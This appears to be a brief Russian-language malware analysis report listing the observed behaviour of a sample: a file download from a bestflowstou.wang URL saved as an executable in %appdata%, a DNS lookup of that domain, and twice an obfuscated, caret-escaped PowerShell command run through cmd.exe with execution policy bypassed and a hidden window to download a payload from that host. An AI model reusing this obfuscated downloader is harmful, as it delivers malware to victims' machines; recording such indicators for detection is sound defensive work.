Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^E^Rshel^l^.EX^E -EXE^c^u^T^IO^nPOLICy^ b^y^Pa^ss^ -^nO^pROFI^lE ^-WIn^dowst^yL^e^ HiddEN (N^ew^-OB^je^ct^ sYs^tE^M^.N^Et^.weB^C^LienT).DOw^nloaDfi^L^E('http://bestflowstou.wa...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "pOW^E^Rshel^l^.EX^E -EXE^c^u^T^IO^nPOLICy^ b^y^Pa^ss^ -^nO^pROFI^lE ^-WIn^dowst^yL^e^ HiddEN (N^ew^-OB^je^ct^ sYs^tE^M^.N^Et^.weB^C^LienT).DOw^nloaDfi^L^E('http://bestflowstou.wa...' (со скрытым окном)